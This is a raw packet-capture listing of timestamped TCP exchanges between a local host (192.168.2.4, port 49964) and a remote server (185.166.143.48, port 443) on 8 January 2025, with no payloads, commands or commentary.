Jan 8, 2025 13:55:35.663825989 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.663835049 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.663868904 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.664156914 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.664179087 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.664222956 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.664235115 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.664283991 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.664413929 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.664436102 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.664483070 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.664490938 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.664530039 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.664710045 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.664731026 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.664773941 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.664781094 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.664810896 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.664834023 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.749782085 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.749800920 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.749869108 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.749876022 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.749876022 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.749891996 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.749908924 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.749936104 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.750118971 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.750125885 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.750221968 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.750241041 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.750241995 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.750253916 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.750313997 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.750313997 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.750435114 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.750449896 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.750531912 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.750540018 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.750632048 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.750719070 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.750735044 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.750817060 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.750823975 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.750891924 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.751085997 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.751101017 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.751161098 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.751168013 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.751235962 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.751332045 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.751348972 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.751429081 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.751436949 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.751487017 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.751643896 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.751660109 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.751697063 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.751708984 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.751737118 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.751765966 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.836632013 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.836651087 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.836728096 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.836750984 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.836771965 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.836801052 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.836843014 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.837132931 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.837147951 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.837219000 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.837219000 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.837229967 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.837332964 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.837356091 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.837390900 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.837400913 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.837425947 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.837647915 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.837661028 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.837759972 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.837768078 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.838016033 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.838033915 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.838089943 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.838097095 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.838125944 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.838138103 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.838150978 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.838226080 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.838233948 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.838526964 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.838543892 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.838612080 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.838624001 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.923707008 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.923726082 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.923815966 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.923836946 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.923892021 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.923892021 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.923919916 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.923959970 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.923966885 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.923991919 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.924000978 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.924015045 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.924114943 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.924127102 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.924247026 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.924269915 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.924310923 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.924319983 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.924395084 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.924624920 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.924639940 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.924712896 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.924712896 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.924722910 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.925184965 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.925209045 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.925254107 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.925265074 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.925299883 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.925479889 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.925493956 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.925565958 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.925565958 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.925575972 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.925587893 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.925606966 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.925647020 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:35.925653934 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:35.925683975 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013246059 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013264894 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013339996 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013339996 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013350010 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013370991 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013389111 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013465881 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013465881 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013473988 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013487101 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013514996 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013557911 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013578892 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013578892 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013588905 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013638973 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013664007 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013689995 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013699055 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013720989 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013730049 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013751030 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013756037 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013797998 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013808012 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013823986 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013837099 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013845921 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013863087 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013900042 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013900042 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.013928890 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013945103 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.013993025 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.014044046 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.014045000 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.014062881 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.014087915 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.014121056 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.097709894 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.097733021 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.097791910 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.097800970 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.097841024 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.097856045 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.097875118 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.097920895 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.097920895 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.097927094 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.098313093 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.098329067 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.098385096 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.098385096 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.098391056 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.098423958 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.098448992 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.098491907 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.098496914 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.098555088 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.098747969 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.098762989 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.098818064 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.098818064 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.098824978 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.098834991 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.098854065 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.098897934 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.098897934 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.098903894 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.099591017 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.099606037 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.099668980 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.099668980 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.099680901 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.099806070 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.185295105 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.185319901 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.185369968 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.185384035 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.185410976 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.185416937 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.185436964 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.185461998 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.185461998 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.185466051 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.185523987 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.185523987 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.185545921 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.185563087 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.185625076 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.185625076 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.185631037 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.185739040 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.185755014 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.185813904 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.185813904 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.185821056 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.186008930 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.186022043 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.186089993 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.186089993 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.186095953 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.186245918 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.186264038 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.186319113 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.186319113 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.186326027 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.186984062 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.186999083 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.187107086 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.187107086 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.187114000 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.187267065 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.187285900 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.187355042 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.187355042 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.187361956 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.187614918 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.271589994 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.271610022 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.271661997 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.271725893 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.271725893 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.271725893 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.271739006 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.271759033 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.271831036 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.272283077 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.272298098 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.272363901 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.272372961 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.272372961 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.272383928 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.272401094 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.272428036 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.272439957 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.272475004 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.272480011 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.272515059 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.272583961 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.272663116 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.272696018 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.272727013 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.272732019 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.272757053 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.272970915 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.272989035 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.273026943 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.273032904 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.273071051 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.273175955 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.273190975 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.273227930 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.273240089 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.273262978 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.358511925 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.358535051 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.358629942 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.358629942 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.358640909 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.358835936 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.358871937 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.358896971 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.358907938 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.358941078 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.358968973 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.358984947 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.359031916 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.359036922 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.359083891 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.359098911 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.359105110 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.359131098 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.359136105 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.359329939 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.359575987 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.359592915 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.359656096 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.359662056 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.359707117 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.359739065 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.359813929 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.359828949 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.359891891 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.359891891 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.359898090 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.360567093 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.360591888 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.360636950 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.360644102 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.360685110 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.360975981 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.445318937 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.445346117 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.445436001 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.445436001 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.445445061 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.445523977 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.445578098 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.445595026 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.445723057 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.445723057 CET	49964	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:36.445729971 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.445828915 CET	443	49964	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:36.445852995 CET	443	49964	185.166.143.48	192.168.2.4
